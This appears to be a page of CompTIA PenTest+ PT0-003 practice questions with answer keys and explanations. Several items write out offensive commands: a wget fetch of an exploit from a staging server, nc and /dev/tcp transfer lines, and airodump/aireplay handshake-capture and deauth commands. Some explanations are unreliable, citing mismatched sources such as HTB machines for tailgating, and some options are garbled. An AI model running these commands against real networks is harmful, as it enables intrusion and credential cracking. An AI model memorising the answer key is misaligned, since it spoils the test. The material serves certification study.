CompTIA PT0-003 Online Practice Questions and Exam Preparation

CompTIA PT0-003 Online Questions & Answers

• Question 41:

  Which of the following components should a penetration tester include in an assessment report?

  A. User activities
  B. Customer remediation plan
  C. Key management
  D. Attack narrative
  D. Attack narrative

  ---

  Explanation

  An attack narrative is a crucial part of a penetration testing report. It explains how the tester was able to exploit vulnerabilities, providing a story-like structure of the attack path taken. This helps the client understand the sequence of actions, from initial access to potential compromise, and the real-world impact.

  The attack narrative often includes:

  Initial access methods

  Privilege escalation steps

  Lateral movement within the network

  Data exfiltration scenarios

  Tools and techniques used

  According to the CompTIA PenTest+ PT0-003 Official Study Guide (Chapter 11: Reporting and Communication):

  "The attack narrative should be a detailed timeline of the tester's actions, findings, and techniques used during the assessment. It allows technical and non-technical stakeholders to understand the context of the findings."

  References:

  CompTIA PenTest+ PT0-003 Official Study Guide, Chapter 11

• Question 42:

  A penetration tester is conducting an assessment of a web application's login page. The tester needs to determine whether there are any hidden form fields of interest.

  Which of the following is the most effective technique?

  A. XSS
  B. On-path attack
  C. SQL injection
  D. HTML scraping
  D. HTML scraping

  ---

  Explanation

  Hidden form fields in web applications can store user roles, session tokens, and security parameters that attackers may exploit.

  HTML scraping (Option D):

  Involves analyzing HTML source code to find hidden fields like:

  <input type="hidden" name="admin_access" value="true">

  Attackers use tools like Burp Suite, ZAP, or browser developer tools (Ctrl+U or Inspect Element) to locate hidden fields.

  References:

  CompTIA PenTest+ PT0-003 Official Study Guide - "Web Application Testing and Form Field Analysis"

  Incorrect options:

  Option A (XSS): Exploits JavaScript injection, not for finding hidden fields.

  Option B (On-path attack): Involves MITM interception, not directly analyzing form fields.

  Option C (SQL injection): Targets databases, not HTML forms

• Question 43:

  A Chief Information Security Officer wants to evaluate the security of the company's e- commerce application.

  Which of the following tools should a penetration tester use FIRST to obtain relevant information from the application without triggering alarms?

  A. SQLmap
  B. DirBuster
  C. w3af
  D. OWASP ZAP
  C. w3af

  ---

  Explanation

  W3AF, the Web Application Attack and Audit Framework, is an open source web application security scanner that includes directory and filename bruteforcing in its list of capabilities.

• Question 44:

  A penetration tester is performing an authorized physical assessment. During the test, the tester observes an access control vestibule and on-site security guards near the entry door in the lobby.

  Which of the following is the best attack plan for the tester to use in order to gain access to the facility?

  A. Clone badge information in public areas of the facility to gain access to restricted areas.
  B. Tailgate into the facility during a very busy time to gain initial access.
  C. Pick the lock on the rear entrance to gain access to the facility and try to gain access.
  D. Drop USB devices with malware outside of the facility in order to gain access to internal machines.
  B. Tailgate into the facility during a very busy time to gain initial access.

  ---

  Explanation

  In an authorized physical assessment, the goal is to test physical security controls. Tailgating is a common and effective technique in such scenarios. Here's why option B is correct:

  Tailgating: This involves following an authorized person into a secure area without proper credentials.

  During busy times, it's easier to blend in and gain access without being noticed. It tests the effectiveness of physical access controls and security personnel.

  Cloning Badge Information: This can be effective but requires proximity to employees and specialized equipment, making it more complex and time-consuming.

  Picking Locks: This is a more invasive technique that carries higher risk and is less stealthy compared to tailgating.

  Dropping USB Devices: This tests employee awareness and response to malicious devices but does not directly test physical access controls.

  References:

  Writeup HTB: Demonstrates the effectiveness of social engineering and tailgating techniques in bypassing physical security measures.

  Forge HTB: Highlights the use of non-invasive methods like tailgating to test physical security without causing damage or raising alarms.

  Option B, tailgating into the facility during a busy time, is the best attack plan to gain access to the facility in an authorized physical assessment.

• Question 45:

  During a wireless engagement, a tester captures packets but notices the target AP broadcasts WPA3-SAE only.

  Which attack is MOST likely ineffective against this target?

  A. Dictionary attack against the handshake
  B. Deauthentication attack to force reconnection
  C. Evil twin impersonation
  D. Capture of beacon frames
  A. Dictionary attack against the handshake

  ---

  Explanation

  WPA3-SAE uses Dragonfly key exchange, resistant to offline dictionary attacks because handshake material cannot be cracked via traditional WPA2 methods.

  Why not others:

  Option B - Deauth attacks may fail if client devices use Protected Management Frames (PMF), but WPA3 alone doesn't guarantee immunity.

  Option C - Evil twin attacks may still work depending on client behavior.

  Option D - Beacon frames are always capturable.

  PT0-003 Mapping: Domain 3 - Wireless security testing and WPA3 limitations.

• Question 46:

  A penetration tester is performing a vulnerability scan on a large ATM network. One of the organization's requirements is that the scan does not affect legitimate clients' usage of the ATMs.

  Which of the following should the tester do to best meet the company's vulnerability scan requirements?

  A. Use Nmap's -T2 switch to run a slower scan and with less resources.
  B. Run the scans using multiple machines.
  C. Run the scans only during lunch hours.
  D. Use Nmap's -host-timeout switch to skip unresponsive targets.
  A. Use Nmap's -T2 switch to run a slower scan and with less resources.

• Question 47:

  A penetration tester ran the following command on a staging server:

  python SimpleHTTPServer 9891

  Which of the following commands could be used to download a file named exploit to a target machine for execution?

  A. nc 10.10.51.50 9891 < exploit
  B. powershell xec bypass \\10.10.51.50\9891
  C. bash >& /dev/tcp/10.10.51.50/9891 0&1>/exploit
  D. wget 10.10.51.50:9891/exploit
  D. wget 10.10.51.50:9891/exploit

  ---

  Explanation

  References:

  https://www.redhat.com/sysadmin/simple-http-server

• Question 48:

  Which of the following explains the reason a tester would opt to use DREAD over PTES during the planning phase of a penetration test?

  A. The tester is conducting a web application test.
  B. The tester is assessing a mobile application.
  C. The tester is evaluating a thick client application.
  D. The tester is creating a threat model.
  D. The tester is creating a threat model.

  ---

  Explanation

  DREAD (Damage, Reproducibility, Exploitability, Affected Users, Discoverability) is a threat modeling framework used to assess and prioritize risks.

  Option A (Web application test): While DREAD can be used in web security, PTES (Penetration Testing Execution Standard) is a better framework for conducting pentests.

  Option B (Mobile application test) : PTES provides guidelines for mobile security testing, whereas DREAD is for threat modeling.

  Option C (Thick client application): Thick clients require specific testing methodologies, not DREAD.

  Option D (Creating a threat model): Correct.

  DREAD is designed for risk assessment and prioritization.

  PTES focuses on penetration testing execution, not threat modeling.

  References:

  CompTIA PenTest+ PT0-003 Official Guide ?Threat Modeling with DREAD vs. PTES

• Question 49:

  A penetration tester writes the following script to enumerate a /24 network:

  1 #!/bin/bash

  2 for i in {1..254};

  3 ping -c1 192.168.1.$i

  4 done

  The tester executes the script, but it fails with the following error:

  -bash: syntax error near unexpected token 'ping'

  Which of the following should the tester do to fix the error?

  A. Add do after line 2.
  B. Replace {1..254} with $(seq 1 254).
  C. Replace bash with tsh.
  D. Replace $i with ${i}.
  A. Add do after line 2.

  ---

  Explanation

  The error in the script is due to a missing do keyword in the for loop. In Bash syntax, a for loop must include the do keyword before the commands that will be executed in each iteration.

  Original Script

  1 #!/bin/bash

  2 for i in {1..254};

  3 ping -c1 192.168.1.$i

  4 done

  Corrected Script

  1 #!/bin/bash

  2 for i in {1..254}; do

  3 ping -c1 192.168.1.$i

  4 done

  Adding do after line 2 corrects the syntax error and allows the script to execute properly.

• Question 50:

  A tester needs to begin capturing WLAN credentials for cracking during an on-site engagement.

  Which of the following is the best command to capture handshakes?

  A. tcpdump -n -s0 -w <pcapname> -i <iface>
  B. airserv-ng -d <iface>
  C. aireplay-ng -0 1000 -a <target_mac>
  D. airodump-ng -c 6 --bssid <target_mac> <iface>
  D. airodump-ng -c 6 --bssid <target_mac> <iface>

  ---

  Explanation

  The command airodump-ng -c 6 --bssid <target_mac> <iface> is used to capture WPA/WPA2 4-way handshakes on a specific channel and BSSID. This handshake is necessary for offline password cracking using tools like Hashcat or John the Ripper.

  From the CompTIA PenTest+ PT0-003 Official Study Guide (Chapter 7 ?Wireless Attacks) :

  "Airodump-ng is used to capture handshakes between a client and access point. The attacker can then attempt to crack the captured handshake offline."

  Chapter 7, CompTIA PenTest+ PT0-003 Official Study Guide